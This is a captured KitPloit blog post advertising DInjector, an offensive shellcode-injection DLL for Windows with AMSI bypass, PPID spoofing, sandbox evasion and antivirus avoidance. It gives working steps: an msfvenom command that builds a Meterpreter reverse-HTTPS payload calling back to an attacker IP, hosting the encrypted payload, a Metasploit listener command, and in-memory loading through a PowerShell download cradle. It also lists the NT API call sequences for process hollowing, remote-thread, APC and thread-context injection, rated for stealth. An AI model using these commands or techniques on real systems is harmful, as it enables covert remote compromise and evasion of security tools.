www.kitploit.com
Open in
urlscan Pro
2606:4700:3031::6815:55d
Public Scan
URL:
https://www.kitploit.com/2021/12/dinjector-collection-of-shellcode.html
Submission: On December 11 via api from US — Scanned from DE
Submission: On December 11 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
GET /search/max-results=7
<form action="/search/max-results=7" id="searchform" method="get">
<input id="s" name="q" placeholder="Enter search term..." type="text">
<input id="searchsubmit" type="submit" value="Search">
</form>POST https://feedburner.google.com/fb/a/mailverify
<form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow"
onsubmit="window.open('https://feedburner.google.com/fb/a/mailverify?uri=PentestTools', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input name="uri" type="hidden" value="PentestTools">
<input name="loc" type="hidden" value="en_US">
<input id="hbzemailbox" name="email" required="" type="text" placeholder="Your Email">
<input id="hbzemailbutton" title="" type="submit" value="Subscribe to our Newsletter">
</form>POST https://feedburner.google.com/fb/a/mailverify
<form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow"
onsubmit="window.open('https://feedburner.google.com/fb/a/mailverify?uri=PentestTools', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input name="uri" type="hidden" value="PentestTools">
<input name="loc" type="hidden" value="en_US">
<input id="hbzemailbox" name="email" required="" type="text" placeholder="Your Email">
<input id="hbzemailbutton" title="" type="submit" value="Subscribe to our Newsletter">
</form>Text Content
KITPLOIT - PENTEST & HACKING TOOLS
KitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and
Network Security ☣
*
*
*
*
Home
* Exploits
* Windows
* Linux
* Mac OS
* Android
* iPhone
* SQLi
* Others
* Wireless
* Linux Distribution
* XSS
* DDoS
* OSINT
* Malware
* Remove Adware
* Scanners
* Contact
* Contact
* Submit a Tool
Home / DInjector / Dinvoke / msfvenom / Process Hollowing / Scan / Shellcode /
Shellcode Injection / Shellcode Loader / Spoofing / DInjector - Collection Of
Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL
DINJECTOR - COLLECTION OF SHELLCODE INJECTION TECHNIQUES PACKED IN A D/INVOKE
WEAPONIZED DLL
1 day ago 8:30 AM | Post sponsored by FaradaySEC | Multiuser Pentest Environment
Zion3R
This repository is an accumulation of my code snippets for various shellcode
injection techniques using fantastic D/Invoke API by @TheWover and
@FuzzySecurity.
Features:
* Fully ported to D/Invoke API
* Encrypted payloads which can be invoked from a URL or passed in base64 as an
argument
* Built-in AMSI bypass
* PPID spoofing and block non-Microsoft DLLs (stolen from TikiTorch, write-up
is here)
* Sandbox detection & evasion
Based on my testings the DInvoke NuGet package itself is being flagged by many
commercial AV/EDR solutions when incuded as an embedded resource via
Costura.Fody (or similar approaches), so I've shrinked it a bit and included
from source to achieve better OpSec.
USAGE
1. Compile the project in VS.
2. Generate a shellcode for your favourite C2:
~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin
3. Encrypt the shellcode:
~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc
4. Serve the encrypted shellcode and prepare C2 listener:
~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run"
5. Use the PowerShell download cradle to load DInjector.dll as
System.Reflection.Assembly and execute it from memory.
I do not recommend putting the assembly on disk because it will very likely be
flagged.
Required global arguments:
Name Example Value Description /am51 True, False Applies AMSI bypass /sc
http://10.10.13.37/enc Sets shellcode path (can be loaded from URL or as a
Base64 string) /password Passw0rd! Sets password to decrypt the shellcode
MODULES
OpSec safe considerations are based on my personal usage expirience and some
testings along the way.
FUNCTIONPOINTER
module_name: 'functionpointer'
description: |
Allocates a RWX memory region, copies the shellcode into it
and executes it like a function.
calls:
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
- 'http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/'
- 'https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis'
- 'https://www.fergonez.net/post/shellcode-csharp'
FUNCTIONPOINTERV2
module_name: 'functionpointerv2'
description: |
Sets RWX on a byte array and executes it like a function.
calls:
- ntdll.dll:
1: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
- 'https://jhalon.github.io/utilizing-syscalls-in-csharp-1/'
- 'https://jhalon.github.io/utilizing-syscalls-in-csharp-2/'
- 'https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs'
CURRENTTHREAD
module_name: 'currentthread'
description: |
Injects shellcode into current process.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
3: 'NtCreateThreadEx'
4: 'NtWaitForSingleObject'
opsec_safe: false
references:
- 'https://github.com/XingYun-Cloud/D-Invoke-syscall/blob/main/Program.cs'
REMOTETHREAD
module_name: 'remotethread'
arguments: |
/pid:1337
description: |
Injects shellcode into an existing remote process.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtOpenProcess'
2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
3: 'NtWriteVirtualMemory'
4: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
5: 'NtCreateThreadEx'
opsec_safe: false
references:
- 'https://github.com/S3cur3Th1sSh1t/SharpImpersonation/blob/main/SharpImpersonation/Shellcode.cs'
REMOTETHREADSUSPENDED
protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV
scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread
execution via NtCreateThreadEx. calls: - ntdll.dll: 1: 'NtOpenProcess' 2:
'NtAllocateVirtualMemory (PAGE_READWRITE)' 3: 'NtWriteVirtualMemory' 4:
'NtProtectVirtualMemory (PAGE_NOACCESS)' 5: 'NtCreateThreadEx
(CREATE_SUSPENDED)' 6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)' 7:
'NtResumeThread' opsec_safe: true references: -
'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/' -
'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs'
">
module_name: 'remotethreadsuspended'
arguments: |
/pid:1337
description: |
Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS.
After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtOpenProcess'
2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
3: 'NtWriteVirtualMemory'
4: 'NtProtectVirtualMemory (PAGE_NOACCESS)'
5: 'NtCreateThreadEx (CREATE_SUSPENDED)'
6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
7: 'NtResumeThread'
opsec_safe: true
references:
- 'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/'
- 'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs'
REMOTETHREADAPC
module_name: 'remotethreadapc'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via NtQueueApcThread.
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtWriteVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
4: 'NtOpenThread'
5: 'NtQueueApcThread'
6: 'NtAlertResumeThread'
opsec_safe: true
references:
- 'https://rastamouse.me/exploring-process-injection-opsec-part-2/'
- 'https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0'
REMOTETHREADCONTEXT
module_name: 'remotethreadcontext'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via SetThreadContext.
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtWriteVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
4: 'NtCreateThreadEx (CREATE_SUSPENDED)'
5: 'GetThreadContext'
6: 'SetThreadContext'
7: 'NtResumeThread'
opsec_safe: true
references:
- 'https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/'
- 'https://github.com/djhohnstein/CSharpSetThreadContext/blob/master/Runner/Program.cs'
PROCESSHOLLOW
module_name: 'processhollow'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via NtResumeThread (hollowing with shellcode).
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtQueryInformationProcess'
2: 'NtReadVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READWRITE)'
4: 'NtWriteVirtualMemory'
5: 'NtProtectVirtualMemory (oldProtect)'
6: 'NtResumeThread'
opsec_safe: false
references:
- 'https://github.com/CCob/SharpBlock/blob/master/Program.cs'
CREDITS
* @TheWover and @FuzzySecurity for their awesome DInvoke project.
* All those great researchers mentioned in the modules references above.
Download DInjector
DInjector - Collection Of Shellcode Injection Techniques Packed In A D/Invoke
Weaponized DLL Reviewed by Zion3R on 8:30 AM Rating: 5
Tags DInjector X Dinvoke X msfvenom X Process Hollowing X Scan X Shellcode X
Shellcode Injection X Shellcode Loader X Spoofing
Facebook
DINJECTOR - COLLECTION OF SHELLCODE INJECTION TECHNIQUES PACKED IN A D/INVOKE
WEAPONIZED DLL
HYENAE-NG - AN ADVANCED CROSS-PLATFORM NETWORK PACKET GENERATOR AND THE
SUCCESSOR OF HYENAE
THREADSTACKSPOOFER - POC FOR AN ADVANCED IN-MEMORY EVASION TECHNIQUE ALLOWING TO
BETTER HIDE INJECTED SHELLCODE'S MEMORY ALLOCATION FROM SCANNERS AND ANALYSTS
* Next Tarian - Antivirus for Kubernetes
* Previous AFLTriage - Tool To Triage Crashing Input Files Using A Debugger
POST COMMENTS
* facebook
* disqus
FOLLOW US!
POPULAR
* Forbidden - Bypass 4Xx HTTP Response Status Codes
Bypass 4xx HTTP response status codes. Based on PycURL . Script uses
multithreading, and is based on brute forcing so might have some fa...
* Toutatis - A Tool That Allows You To Extract Information From Instagrams
Accounts Such As E-Mails, Phone Numbers And More
Toutatis is a tool that allows you to extract information from instagrams
accounts such as e-mails, phone numbers and more
* AirStrike - Automatically Grab And Crack WPA-2 Handshakes With Distributed
Client-Server Architecture
Tool that automates cracking of WPA-2 Wi-Fi credentials using client-server
architecture
* STEWS - A Security Tool For Enumerating WebSockets
STEWS is a tool suite for security testing of WebSockets This research was
first presented at OWASP Global AppSec US 2021
* IAM Vulnerable - Use Terraform To Create Your Own Vulnerable By Design AWS
IAM Privilege Escalation Playground
Use Terraform to create your own vulnerable by design AWS IAM privilege
escalation playground. IAM Vulnerable uses the Terraform bina...
BLOG ARCHIVE
Blog Archive December 2021 (21) November 2021 (60) October 2021 (62) September
2021 (63) August 2021 (62) July 2021 (61) June 2021 (59) May 2021 (63) April
2021 (61) March 2021 (56) February 2021 (55) January 2021 (61) December 2020
(53) November 2020 (60) October 2020 (60) September 2020 (62) August 2020 (63)
July 2020 (65) June 2020 (63) May 2020 (65) April 2020 (61) March 2020 (66)
February 2020 (58) January 2020 (64) December 2019 (57) November 2019 (60)
October 2019 (62) September 2019 (60) August 2019 (62) July 2019 (62) June 2019
(61) May 2019 (62) April 2019 (60) March 2019 (62) February 2019 (56) January
2019 (60) December 2018 (56) November 2018 (59) October 2018 (61) September 2018
(60) August 2018 (62) July 2018 (62) June 2018 (60) May 2018 (60) April 2018
(60) March 2018 (61) February 2018 (56) January 2018 (62) December 2017 (61)
November 2017 (60) October 2017 (62) September 2017 (57) August 2017 (59) July
2017 (52) June 2017 (33) May 2017 (32) April 2017 (31) March 2017 (34) February
2017 (28) January 2017 (31) December 2016 (29) November 2016 (30) October 2016
(31) September 2016 (28) August 2016 (31) July 2016 (22) June 2016 (27) May 2016
(26) April 2016 (26) March 2016 (27) February 2016 (25) January 2016 (32)
December 2015 (29) November 2015 (23) October 2015 (20) September 2015 (21)
August 2015 (29) July 2015 (23) June 2015 (37) May 2015 (33) April 2015 (19)
March 2015 (16) February 2015 (20) January 2015 (29) December 2014 (16) November
2014 (16) October 2014 (13) September 2014 (18) August 2014 (30) July 2014 (40)
June 2014 (41) May 2014 (29) April 2014 (44) March 2014 (60) February 2014 (52)
January 2014 (69) December 2013 (68) November 2013 (37) October 2013 (32)
September 2013 (25) August 2013 (42) July 2013 (16) June 2013 (18) May 2013 (22)
April 2013 (41) March 2013 (26) February 2013 (22) January 2013 (16) December
2012 (16) November 2012 (39)
RECOMMENDED
1. SSD cloud server on DigitalOcean
2. Exploit Collector
3. BlackPloit
4. Hacking Reviews
5. Hacking Land
SOCIAL
Copyright © 2021 KitPloit - PenTest & Hacking Tools
Back To Top
Powered by Blogger.
Diese Website verwendet Cookies von Google, um Dienste anzubieten und Zugriffe
zu analysieren. Deine IP-Adresse und dein User-Agent werden zusammen mit
Messwerten zur Leistung und Sicherheit für Google freigegeben. So können
Nutzungsstatistiken generiert, Missbrauchsfälle erkannt und behoben und die
Qualität des Dienstes gewährleistet werden.Weitere InformationenOk